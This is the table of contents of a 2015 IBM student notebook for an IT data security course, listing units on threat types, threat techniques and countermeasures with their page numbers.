
V10.1
Student Notebook

Contents
Trademarks . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ix

Course description . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . xi

Agenda . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . xiii

Unit 1. Data Security Threats . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1-1

IT Data Security – Data Security Threats . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1-2
Unit objectives . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1-3
Background . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1-4
Case Study 1 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1-5
Case Study 2 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1-6
Case Study 3 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1-8
Need of Data Security (1 of 2) . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1-9
Need of Data Security (2 of 2) . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1-10
Importance of Data Security . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1-11
Critical Data for Organizations . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1-12
Elements to consider for a better security mechanism . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1-13
Process 1 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1-14
Process 2 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1-15
Process 3 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1-16
Types of Data Security Threats . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1-17
Malware Threat (1 of 7) . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1-18
Malware Threat (2 of 7) . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1-19
Malware Threat (3 of 7) . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1-20
Malware Threat (4 of 7) . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1-21
Malware Threat (5 of 7) . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1-22
Malware Threat (6 of 7) . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1-23
Malware Threat (7 of 7) . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1-24
Types of Data Security Threats (Contd.) . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1-25
Network Based Threats (1 of 11) . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1-26
Network Based Threats (2 of 11) . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1-27
Network Based Threats (3 of 11) . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1-28
Network Based Threats (4 of 11) . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1-29
Network Based Threats (5 of 11) . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1-30
Network Based Threats (6 of 11) . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1-32
Network Based Threats (7 of 11) . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1-33
Network Based Threats (8 of 11) . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1-34
Network Based Threats (9 of 11) . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1-35
Network Based Threats (10 of 11) . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1-36
Network Based Threats (11 of 11) . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1-37
Types of Data Security Threats (Contd.) . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1-38
Cryptographic Threats (1 of 7) . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1-39
Cryptographic Threats (2 of 7) . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1-40
Cryptographic Threats (3 of 7) . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1-41
Cryptographic Threats (4 of 7) . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1-42
Cryptographic Threats (5 of 7) . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1-43
Cryptographic Threats (6 of 7) . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1-44

© Copyright IBM Corp. 2015 Contents iii


Course materials may not be reproduced in whole or in part
without the prior written permission of IBM.
Student Notebook

Cryptographic Threats (7 of 7) . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1-45

Types of Data Security Threats . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1-46
Database Security Threats (1 of 6) . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1-47
Database Security Threats (2 of 6) . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1-48
Database Security Threats (3 of 6) . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1-49
Database Security Threats (4 of 6) . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1-50
Database Security Threats (5 of 6) . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1-51
Database Security Threats (6 of 6) . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1-52
Types of Data Security Threats (Contd.) . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1-53
Banking Fraud Threats (1 of 4) . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1-54
Banking Fraud Threats (2 of 4) . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1-55
Banking Fraud Threats (3 of 4) . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1-56
Banking Fraud Threats (4 of 4) . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1-57
Types of Data Security Threats (Contd.) . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1-58
Web-application Threats (1 of 5) . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1-59
Web-application Threats (2 of 5) . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1-60
Web-application Threats (3 of 5) . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1-61
Web-application Threats (4 of 5) . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1-62
Web-application Threats (5 of 5) . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1-63
Types of Data Security Threats (Contd.) . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1-64
Physical Security Threats . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1-65
Types of Data Security Threats (Contd.) . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1-66
Types of Data Security Threats . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1-67
Wireless Network Security Threat (1 of 5) . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1-68
Wireless Network Security Threats (2 of 5) . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1-69
Wireless Network Security Threats (3 of 5) . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1-70
Wireless Network Security Threats (4 of 5) . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1-71
Wireless Network Security Threats (5 of 5) . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1-72
Types of Data Security Threats (Contd.) . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1-73
Bluetooth Devices Threats (1 of 5) . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1-74
Bluetooth Devices Threats (2 of 5) . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1-75
Bluetooth Devices Threats (3 of 5) . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1-76
Bluetooth Devices Threats (4 of 5) . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1-77
Bluetooth Devices Threats (5 of 5) . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1-78
Data Threats in Modern Era (1 of 6) . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1-79
Data Threats in Modern Era (2 of 6) . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1-80
Data Threats in Modern Era (3 of 6) . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1-81
Data Threats in Modern Era (4 of 6) . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1-82
Data Threats in Modern Era (5 of 6) . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1-83
Data Threats in Modern Era (6 of 6) . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1-84
Benefits of Data Security (1 of 2) . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1-85
Benefits of Data Security (2 of 2) . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1-86
Checkpoint (1 of 4) . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1-87
Checkpoint (2 of 4) . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1-88
Checkpoint (3 of 4) . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1-89
Checkpoint (4 of 4) . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1-90
Unit summary . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1-91

Unit 2. Data Security Threat Techniques . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .2-1


IT Data Security – Data Security Threat Techniques . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .2-2
Unit objectives . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .2-3


Introduction . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 2-4


Threat Techniques (1 of 66) . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 2-5
Threat Techniques (2 of 66) . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 2-6
Threat Techniques (3 of 66) . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 2-7
Threat Techniques (4 of 66) . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 2-8
Threat Techniques (5 of 66) . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 2-9
Threat Techniques (6 of 66) . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 2-11
Threat Techniques (7 of 66) . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 2-12
Threat Techniques (8 of 66) . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 2-13
Threat Techniques (9 of 66) . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 2-14
Threat Techniques (10 of 66) . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 2-15
Threat Techniques (11 of 66) . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 2-16
Threat Techniques (12 of 66) . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 2-17
Threat Techniques (13 of 66) . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 2-18
Threat Techniques (14 of 66) . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 2-20
Threat Techniques (15 of 66) . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 2-21
Threat Technique (16 of 66) . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 2-22
Threat Techniques (17 of 66) . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 2-24
Threat Techniques (18 of 66) . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 2-25
Threat Techniques (19 of 66) . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 2-26
Threat Techniques (20 of 66) . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 2-27
Threat Techniques (21 of 66) . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 2-28
Network Based Threat Techniques (22 of 66) . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 2-29
Threat Techniques (23 of 66) . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 2-30
Threat Techniques (24 of 66) . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 2-31
Network Based Threat Techniques (25 of 66) . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 2-32
Threat Techniques (26 of 66) . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 2-33
Threat Techniques (27 of 66) . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 2-34
Threat Techniques (28 of 66) . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 2-35
Threat Techniques (29 of 66) . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 2-36
Threat Techniques (30 of 66) . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 2-37
Cryptographic Threat Techniques (31 of 66) . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 2-38
Threat Techniques (32 of 66) . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 2-39
Threat Techniques (33 of 66) . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 2-40
Threat Techniques (34 of 66) . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 2-41
Threat Technique (35 of 66) . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 2-42
Threat Techniques (36 of 66) . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 2-45
Threat Techniques (37 of 66) . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 2-46
Threat Techniques (38 of 66) . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 2-47
Threat Technique (39 of 66) . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 2-48
Threat Techniques (40 of 66) . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 2-49
Threat Techniques (41 of 66) . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 2-50
Threat Techniques (42 of 66) . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 2-51
Banking Fraud Techniques (43 of 66) . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 2-52
Threat Techniques (44 of 66) . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 2-53
Threat Techniques (45 of 66) . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 2-54
Threat Techniques (46 of 66) . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 2-55
Threat Technique (47 of 66) . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 2-56
Threat Techniques (48 of 66) . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 2-58
Threat Techniques (49 of 66) . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 2-59
Threat Techniques (50 of 66) . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 2-61


Web-application Threat Techniques (51 of 66) . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .2-63


Threat Techniques (52 of 66) . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .2-64
Threat Techniques (53 of 66) . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .2-65
Threat Techniques (54 of 66) . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .2-66
Web-application Threat Techniques (55 of 66) . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .2-67
Web-application Threat Techniques (56 of 66) . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .2-68
Threat Techniques (57 of 66) . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .2-69
Threat Techniques (58 of 66) . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .2-70
Wireless Network Threat Techniques (59 of 66) . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .2-71
Threat Technique (60 of 66) . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .2-72
Threat Techniques (61 of 66) . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .2-73
Wireless Network Threat Techniques (62 of 66) . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .2-74
Threat Techniques (63 of 66) . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .2-75
Threat Techniques (64 of 66) . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .2-76
Threat Techniques (65 of 66) . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .2-77
Threat Techniques (66 of 66) . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .2-78
Checkpoint (1 of 4) . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .2-79
Checkpoint (2 of 4) . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .2-80
Checkpoint (3 of 4) . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .2-81
Checkpoint (4 of 4) . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .2-82
Unit summary . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .2-83

Unit 3. Countermeasures . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .3-1


IT Data Security – Countermeasures . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .3-2
Unit objectives . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .3-3
Introduction . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .3-4
The Importance of Data Protection . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .3-5
Evolution of Mitigation Technique (1 of 6) . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .3-7
Evolution of Mitigation Technique (2 of 6) . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .3-8
Evolution of Mitigation Technique (3 of 6) . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .3-9
Evolution of Mitigation Technique (4 of 6) . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .3-10
Evolution of Mitigation Technique (5 of 6) . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .3-11
Evolution of Mitigation Technique (6 of 6) . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .3-13
Countermeasures (1 of 55) . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .3-14
Countermeasures (2 of 55) . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .3-15
Countermeasures (3 of 55) . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .3-17
Countermeasures (4 of 55) . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .3-18
Countermeasures (5 of 55) . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .3-19
Countermeasures (6 of 55) . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .3-21
Countermeasures (7 of 55) . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .3-22
Countermeasures (8 of 55) . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .3-24
Countermeasures (9 of 55) . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .3-25
Countermeasures (10 of 55) . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .3-27
Countermeasures (11 of 55) . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .3-29
Countermeasures (12 of 55) . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .3-30
Countermeasures (13 of 55) . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .3-32
Countermeasures (14 of 55) . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .3-33
Countermeasures (15 of 55) . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .3-35
Countermeasures (16 of 55) . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .3-36
Countermeasures (17 of 55) . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .3-38
Countermeasures (18 of 55) . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .3-39


Countermeasures (19 of 55) . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 3-40


Countermeasures (20 of 55) . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 3-41
Countermeasures (21 of 55) . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 3-42
Countermeasures (22 of 55) . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 3-43
Countermeasures (23 of 55) . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 3-44
Countermeasures (24 of 55) . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 3-45
Countermeasures (25 of 55) . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 3-46
Countermeasures (26 of 55) . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 3-47
Countermeasures (27 of 55) . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 3-48
Countermeasures (28 of 55) . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 3-49
Countermeasures (29 of 55) . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 3-50
Countermeasures (30 of 55) . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 3-51
Countermeasures (31 of 55) . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 3-52
Countermeasures (32 of 55) . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 3-53
Countermeasures (33 of 55) . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 3-54
Countermeasures (34 of 55) . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 3-55
Countermeasures (35 of 55) . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 3-56
Countermeasures (36 of 55) . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 3-57
Countermeasures (37 of 55) . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 3-58
Countermeasures (38 of 55) . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 3-59
Countermeasures (39 of 55) . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 3-61
Countermeasures (40 of 55) . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 3-62
Countermeasures (41 of 55) . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 3-63
Countermeasures (42 of 55) . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 3-64
Countermeasures (43 of 55) . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 3-65
Countermeasures (44 of 55) . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 3-66
Countermeasures (45 of 55) . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 3-67
Countermeasures (46 of 55) . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 3-68
Countermeasures (47 of 55) . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 3-69
Countermeasures (48 of 55) . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 3-70
Countermeasures (49 of 55) . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 3-71
Countermeasures (50 of 55) . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 3-72
Countermeasures (51 of 55) . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 3-73
